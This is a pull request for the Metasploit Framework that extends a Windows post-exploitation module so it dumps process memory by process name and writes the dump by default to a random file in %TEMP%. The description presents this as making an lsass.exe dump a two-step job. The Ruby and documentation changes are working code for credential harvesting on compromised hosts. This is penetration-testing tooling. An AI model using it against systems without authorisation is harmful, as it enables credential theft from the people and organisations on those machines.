### PR TITLE
post/windows/gather/memory_dump: Support dumping processes by name

### DIFF
--- a/documentation/modules/post/windows/gather/memory_dump.md
+++ b/documentation/modules/post/windows/gather/memory_dump.md
@@ -13,7 +13,7 @@ This module only works on a Meterpreter session on Windows.
   1. Get meterpreter session on a Windows host
   1. Do: `use post/windows/gather/memory_dump`
   1. Do: `set SESSION <session id>`
-  1. Do: `set PID <process id>`
+  1. Do: `set PID <process id>` or `set PROCESS_NAME <process name>`
   1. Do: `set DUMP_PATH <path on remote system>`
   1. Do: `set DUMP_TYPE <standard|full>`
   1. Do: `run`
@@ -26,12 +26,18 @@ This module only works on a Meterpreter session on Windows.
 
 The path that the memory dump will be temporarily stored at. This file is then
 downloaded and deleted at the end of the run. This file should be in a writable
-location, and should not already exist.
+location, and should not already exist. If not specified, the dump is written
+with a random filename in `%TEMP%`.
 
 ### PID
 
 The ID of the process to dump. To find the PID, in your Meterpreter session,
 type `ps`. To find a process by name, type `ps | <process name>`.
+
+### PROCESS_NAME
+
+The name of the process(es) to dump. This will dump memory for all processes
+with this name.
 
 ### DUMP_TYPE
 
@@ -55,7 +61,7 @@ significantly smaller than the Full option.
 
 ## Scenarios
 
-**Dumping lsass**
+### Dumping lsass
 
 Retrieving lsass (after getsystem)
 
@@ -126,5 +132,3 @@ SID               : S-1-5-21-920577323-754201681-977916534-1001
         credman :
         cloudap :
 ```
-
-

--- a/modules/post/windows/gather/memory_dump.rb
+++ b/modules/post/windows/gather/memory_dump.rb
@@ -3,9 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'tempfile'
-
 class MetasploitModule < Msf::Post
+
+  include Msf::Post::Windows::Process
 
   def initialize(info = {})
     super(
@@ -15,8 +15,10 @@ class MetasploitModule < Msf::Post
         'Description' => %q{
           This module creates a memory dump of a process (to disk) and downloads the file
           for offline analysis.
-          Options for DUMP_TYPE affect the completeness of the dump. "full" retrieves
-          the entire process address space (all allocated pages).
+
+          Options for DUMP_TYPE affect the completeness of the dump:
+
+          "full" retrieves the entire process address space (all allocated pages);
           "standard" excludes image files (e.g. DLLs and EXEs in the address space) as
           well as memory mapped files. As a result, this option can be significantly
           smaller in size.
@@ -24,7 +26,7 @@ class MetasploitModule < Msf::Post
         'License' => MSF_LICENSE,
         'Author' => ['smashery'],
         'Platform' => ['win'],
-        'SessionTypes' => ['meterpreter' ],
+        'SessionTypes' => ['meterpreter'],
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [],
@@ -47,15 +49,15 @@ class MetasploitModule < Msf::Post
       )
     )
     register_options([
-      OptInt.new('PID', [true, 'ID of the process to dump memory from']),
-      OptString.new('DUMP_PATH', [true, 'File to write memory dump to', nil]),
+      OptInt.new('PID', [false, 'ID of the process to dump memory from']),
+      OptString.new('PROCESS_NAME', [false, 'Name of the process(es) to dump memory from']),
+      OptString.new('DUMP_PATH', [false, 'File to write memory dump to']),
       OptEnum.new('DUMP_TYPE', [ true, 'Minidump size', 'standard', ['standard', 'full']])
     ])
   end
 
-  def get_process_handle
-    target_pid = datastore['PID']
-    result = session.railgun.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, target_pid)
+  def get_process_handle(pid)
+    result = session.railgun.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, false, pid)
     error = result['GetLastError']
     unless error == 0
       fail_with(Msf::Module::Failure::PayloadFailed, "Unable to open process: #{result['ErrorMessage']}")
@@ -63,8 +65,7 @@ class MetasploitModule < Msf::Post
     result['return']
   end
 
-  def create_file
-    path = datastore['DUMP_PATH']
+  def create_file(path)
     result = session.railgun.kernel32.CreateFileW(
       path,
       'GENERIC_READ | GENERIC_WRITE',
@@ -81,16 +82,15 @@ class MetasploitModule < Msf::Post
     result['return']
   end
 
-  def dump_process
-    target_pid = datastore['PID']
-    name = nil
-    client.sys.process.processes.each do |p|
-      if p['pid'] == target_pid
-        name = p['name']
-      end
-    end
-    fail_with(Msf::Module::Failure::PayloadFailed, "Could not find process #{target_pid}") unless name
-    print_status("Dumping memory for #{name}")
+  def dump_process(pid)
+    process = client.sys.process.processes.select { |p| p['pid'] == pid }.flatten.first
+
+    fail_with(Msf::Module::Failure::PayloadFailed, "Could not find process #{pid}") unless process
+
+    name = process['name'].to_s
+    path = datastore['DUMP_PATH'] || "#{session.sys.config.getenv('TEMP')}\\#{Rex::Text.rand_text_alpha(8..14)}"
+
+    print_status("Dumping memory for #{name} (pid: #{pid}) to #{path}")
 
     if datastore['DUMP_TYPE'] == 'standard'
       # MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithIndirectlyReferencedMemory
@@ -104,15 +104,17 @@ class MetasploitModule < Msf::Post
     process_handle = nil
     file_handle = nil
     begin
-      process_handle = get_process_handle
-      file_handle = create_file
-      result = session.railgun.dbghelp.MiniDumpWriteDump(process_handle,
-                                                         target_pid,
-                                                         file_handle,
-                                                         dump_flags,
-                                                         nil,
-                                                         nil,
-                                                         nil)
+      process_handle = get_process_handle(pid)
+      file_handle = create_file(path)
+      result = session.railgun.dbghelp.MiniDumpWriteDump(
+        process_handle,
+        pid,
+        file_handle,
+        dump_flags,
+        nil,
+        nil,
+        nil
+      )
       unless result['return']
         fail_with(Msf::Module::Failure::PayloadFailed, "Minidump failed: #{result['ErrorMessage']}")
       end
@@ -121,34 +123,49 @@ class MetasploitModule < Msf::Post
       session.railgun.kernel32.CloseHandle(file_handle) if file_handle
     end
 
-    path = datastore['DUMP_PATH']
+    download_dump(path)
+  end
 
-    begin
-      loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, '')
-      src_stat = client.fs.filestat.new(path)
-      print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
-      session.fs.file.download_file(loot_path, path)
-      print_good("Memory dump stored at #{loot_path}")
-    ensure
-      print_status('Deleting minidump from disk')
-      session.fs.file.delete(path)
-    end
+  def download_dump(path)
+    loot_path = store_loot('windows.process.dump', 'application/octet-stream', session, '')
+    src_stat = client.fs.filestat.new(path)
+    print_status("Downloading minidump (#{Filesize.new(src_stat.size).pretty})")
+    session.fs.file.download_file(loot_path, path)
+    print_good("Memory dump stored at #{loot_path}")
+  ensure
+    print_status('Deleting minidump from disk')
+    session.fs.file.delete(path)
   end
 
   def run
-    if session.type != 'meterpreter'
-      print_error 'Only meterpreter sessions are supported by this post module'
-      return
+    fail_with(Failure::BadConfig, 'Only meterpreter sessions are supported by this module') unless session.type == 'meterpreter'
+
+    if datastore['PID'] && datastore['PROCESS_NAME']
+      fail_with(Failure::BadConfig, 'PROCESS_NAME and PID are mutually exclusive.')
     end
 
-    print_status("Running module against #{sysinfo['Computer']}")
-
-    pid = datastore['PID']
-
-    if pid == (session.sys.process.getpid) && !datastore['ForceExploit']
-      fail_with(Msf::Module::Failure::BadConfig, 'Dumping current process is not recommended (can result in deadlock). To run anyway, set ForceExploit to True')
+    unless datastore['PID'] || datastore['PROCESS_NAME']
+      fail_with(Failure::BadConfig, 'PROCESS_NAME or PID must be set.')
     end
 
-    dump_process
+    print_status("Running module against #{sysinfo['Computer']} (#{session.session_host})")
+
+    if datastore['PROCESS_NAME']
+      pids = pidof(datastore['PROCESS_NAME'])
+      fail_with(Failure::BadConfig, "Could not find PID for process '#{datastore['PROCESS_NAME']}'") if pids.empty?
+    else
+      pids = [datastore['PID']]
+    end
+
+    session_pid = session.sys.process.getpid
+
+    pids.uniq.each do |pid|
+      if pid == session_pid && !datastore['ForceExploit']
+        print_warning("Skipping process #{pid}. Dumping current process is not recommended (can result in deadlock). To run anyway, set ForceExploit to True")
+        next
+      end
+
+      dump_process(pid)
+    end
   end
 end


### PR DESCRIPTION
Support dumping processes by name in addition to PID.

Use `%TEMP%\<rand>` as `DUMP_PATH` by default.

Prior to this PR, in order to dump a process (such as `lsass.exe`) you would need to:

* `sessions -i -1 -C "ps | lsass"`
* look for the pid
* `set pid <pid>`
* `set dump_path C:\\some\\writable\\path`
* `run`

After this PR, it is as easy as:

* `set PROCESS_NAME lsass.exe`
* `run`
